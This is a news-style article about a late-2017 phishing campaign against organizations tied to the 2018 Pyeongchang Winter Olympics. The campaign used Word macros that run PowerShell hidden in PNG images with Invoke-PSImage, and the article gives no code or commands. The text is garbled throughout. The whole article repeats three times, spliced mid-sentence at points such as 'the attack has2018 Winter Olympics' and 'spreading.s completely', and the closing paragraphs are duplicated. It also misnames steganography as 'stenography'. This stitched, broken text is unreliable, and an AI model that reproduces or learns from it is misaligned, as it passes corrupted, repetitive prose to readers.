New technologies and innovations are being created daily. Thus, the progression of newer threats are also ever expanding. This shows that malware developers are actually watching out for newer techniques to incorporate with their codes which has now included a week old PowerShell script tool.
This new malware campaign targets organizations involved in the upcoming 2018 Olympics to be held in Pyeongchang, South Korea. it has been said that the targets are organizations that are in association with the Olympics or either providing supporting roles with regards to infrastructure.
Recent file-less malware attacks have been using PowersShell to run in-memory attacks which in turn creates a backdoor for hackers. It is also old news that they incorporate word documents laced with macros and scripts that run once the file is enabled for editing.
It is quite alarming due to its timing. The malicious emails also appear to be coming from South Korea’s National Counter Terrorism Center (NCTC) although researchers say that is it actually originating from Singapore.
It is a clear message which appears to be a warning from the NCTC to be a perfectly timed attack to coincide with the actual security testing that are being done by the organization.
The email and or attachments are prompting users to enable content that allows Microsoft Word to read the attached document. Once the unsuspecting victims enable the content, it immediately launches a Visual Basic Macro that would run a PowerShell script. Here is where they utilize the newly released tool called Invoke-PSImage. This tool has only been released recently last December 20th of 2017.
This new tool is a stenography tool that buries PowerShell scripts in the pixels of PNG images. With this information in mind, it makes it a lot difficult to detect due to the obfuscation of string format operators that it is nearly impossible to detect once extracted to the command line. Down the line, it is used to set up a secure connection to a command and control server as any other malware.
The attack only lasted for a few days from December 22 to 28th of 2017. The Olympics is not due for one more month, which gives them ample time to spread and take its root.
It is uncertain if the attack has2018 Winter Olympics being targeted by file-less malware using brand new tools
New technologies and innovations are being created daily. Thus, the progression of newer threats are also ever expanding. This shows that malware developers are actually watching out for newer techniques to incorporate with their codes which has now included a week old PowerShell script tool.
This new malware campaign targets organizations involved in the upcoming 2018 Olympics to be held in Pyeongchang, South Korea. it has been said that the targets are organizations that are in association with the Olympics or either providing supporting roles with regards to infrastructure.
Recent file-less malware attacks have been using PowersShell to run in-memory attacks which in turn creates a backdoor for hackers. It is also old news that they incorporate word documents laced with macros and scripts that run once the file is enabled for editing.
It is quite alarming due to its timing. The malicious emails also appear to be coming from South Korea’s National Counter Terrorism Center (NCTC) although researchers say that is it actually originating from Singapore.
It is a clear message which appears to be a warning from the NCTC to be a perfectly timed attack to coincide with the actual security testing that are being done by the organization.
The email and or attachments are prompting users to enable content that allows Microsoft Word to read the attached document. Once the unsuspecting victims enable the content, it immediately launches a Visual Basic Macro that would run a PowerShell script. Here is where they utilize the newly released tool called Invoke-PSImage. This tool has only been released recently last December 20th of 2017.
This new tool is a stenography tool that buries PowerShell scripts in the pixels of PNG images. With this information in mind, it makes it a lot difficult to detect due to the obfuscation of string format operators that it is nearly impossible to detect once extracted to the command line. Down the line, it is used to set up a secure connection to a command and control server as any other malware.
The attack only lasted for a few days from December 22 to 28th of 2017. The Olympics is not due for one more month, which gives them ample time to spread and take its root.
It is uncertain if the attack ha2018 Winter Olympics being targeted by file-less malware using brand new tools
New technologies and innovations are being created daily. Thus, the progression of newer threats are also ever expanding. This shows that malware developers are actually watching out for newer techniques to incorporate with their codes which has now included a week old PowerShell script tool.
This new malware campaign targets organizations involved in the upcoming 2018 Olympics to be held in Pyeongchang, South Korea. it has been said that the targets are organizations that are in association with the Olympics or either providing supporting roles with regards to infrastructure.
Recent file-less malware attacks have been using PowersShell to run in-memory attacks which in turn creates a backdoor for hackers. It is also old news that they incorporate word documents laced with macros and scripts that run once the file is enabled for editing.
It is quite alarming due to its timing. The malicious emails also appear to be coming from South Korea’s National Counter Terrorism Center (NCTC) although researchers say that is it actually originating from Singapore.
It is a clear message which appears to be a warning from the NCTC to be a perfectly timed attack to coincide with the actual security testing that are being done by the organization.
The email and or attachments are prompting users to enable content that allows Microsoft Word to read the attached document. Once the unsuspecting victims enable the content, it immediately launches a Visual Basic Macro that would run a PowerShell script. Here is where they utilize the newly released tool called Invoke-PSImage. This tool has only been released recently last December 20th of 2017.
This new tool is a stenography tool that buries PowerShell scripts in the pixels of PNG images. With this information in mind, it makes it a lot difficult to detect due to the obfuscation of string format operators that it is nearly impossible to detect once extracted to the command line. Down the line, it is used to set up a secure connection to a command and control server as any other malware.
The attack only lasted for a few days from December 22 to 28th of 2017. The Olympics is not due for one more month, which gives them ample time to spread and take its root.
It is uncertain if the attack has completely ran its course. But one thing is for sure, Invoke-PSImage is now a a part of the tools that malware developers will be using in the future.
People ask how can file-less malware be prevented. Security researchers and professionals say that attack vectors should be eliminated. One of which is to terminate how email and malicious attachments are handled.
Extreme caution and utmost security is the only way as of this writing to stop file-less malware from spreading.s completely ran its course. But one thing is for sure, Invoke-PSImage is now a a part of the tools that malware developers will be using in the future.
People ask how can file-less malware be prevented. Security researchers and professionals say that attack vectors should be eliminated. One of which is to terminate how email and malicious attachments are handled.
Extreme caution and utmost security is the only way as of this writing to stop file-less malware from spreading. completely ran its course. But one thing is for sure, Invoke-PSImage is now a a part of the tools that malware developers will be using in the future.
People ask how can file-less malware be prevented. Security researchers and professionals say that attack vectors should be eliminated. One of which is to terminate how email and malicious attachments are handled.
Extreme caution and utmost security is the only way as of this writing to stop file-less malware from spreading.
